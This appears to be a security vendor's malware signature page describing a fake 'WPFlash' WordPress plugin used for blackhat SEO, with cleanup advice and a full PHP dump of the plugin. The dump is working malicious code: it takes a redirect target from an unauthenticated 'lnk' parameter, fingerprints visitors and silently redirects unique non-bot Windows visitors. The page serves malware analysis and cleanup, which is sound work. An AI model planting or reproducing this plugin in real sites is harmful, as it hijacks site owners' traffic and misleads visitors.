Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.fake-wpflash.001

php.spam-seo.fake-wpflash.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance.
This malware is being installed into WordPress as a WPFlash plugin (fake) /wp-content/plugins/WPFlash/WPFlash.php. All it does is redirects visitors coming from search engines to third-party sites.
It save addresses of the sites to redirects in the lnk.dat file and keeps track of unique redirected visitors using files in the uqdata subdirectory.
Every redirected visitor is reflected by an asterisk in the stat_hits.dat. To redirect, it hooks the "init" WordPress action.

Affecting

Vulnerable WordPress installations

Cleanup

Find ad delete the malicious plugin from WordPress (and server). Make sure to scan server for backdoors and outdated software. Change all passwords.
You can also sign up with us and let our team remove the malware for you.

Dump


<?php

/*
* Plugin Name: WPFlash
* Version: 1.0
* Author: Barabaka
*/
....

function stripos_array($str, $array)
{
foreach($array as $substr)
{
if (stripos($str, $substr) !== false)
return true;
}
return false;
}

function get_user_browser()
{
$u_agent = $_SERVER["HTTP_USER_AGENT"];
$ub = "";

if(preg_match('/MSIE/i',$u_agent))
{
$ub = "ie";
}
elseif(preg_match('/Firefox/i',$u_agent))
{
$ub = "firefox";
}
elseif(preg_match('/Chrome/i',$u_agent))
{
$ub = "chrome";
}
elseif(preg_match('/Opera/i',$u_agent))
{
$ub = "opera";
}
elseif(preg_match('/Safari/i',$u_agent))
{
$ub = "safari";
}

return $ub;
}

function get_user_system()
{
$u_agent = $_SERVER["HTTP_USER_AGENT"];

if(stripos($u_agent, "Windows") !== false)
return "windows";

if(stripos($u_agent, "Apple") !== false)
return "apple";

if(stripos($u_agent, "Android") !== false)
return "android";

if(stripos($u_agent, "Linux") !== false)
return "linux";

if(stripos($u_agent, "Macintosh") !== false)
return "mac";

return "windows";
}

function is_user_unique()
{
$ip = $_SERVER["REMOTE_ADDR"];
$uid = $ip . "|" . get_user_browser() . "|" . get_user_system();
$uid = substr(md5($uid), 0, 8);

$uid1 = substr($uid, 0, 3);
$uid2 = substr($uid, 3);

if(is_file("uqdata/{$uid1}.dat"))
if(strpos(file_get_contents("uqdata/{$uid1}.dat"), $uid2) !== false)
return false;

if(!is_dir("uqdata"))
mkdir("uqdata");

file_put_contents("uqdata/{$uid1}.dat", $uid2 . " ", FILE_APPEND);

return true;
}

function try_redirect()
{
if(is_file("lnk.dat"))
{
$link = file_get_contents("lnk.dat");

wp_redirect($link);
exit;
}
}

if(isset($_GET["lnk"]))
{
file_put_contents("lnk.dat", $_GET["lnk"]);
echo "OK";
exit;
}

file_put_contents("stat_hits.dat", "*", FILE_APPEND);

$bots = array("google", "yahoo", "msn");
if(stripos_array($_SERVER['HTTP_USER_AGENT'], $bots) == false)
{
$system = get_user_system();
if($system == "windows")
{
file_put_contents("stat_good.dat", "*", FILE_APPEND);

if(is_user_unique())
{
file_put_contents("stat_uniq.dat", "*", FILE_APPEND);

add_action("init", "try_redirect");
}
}
}

?>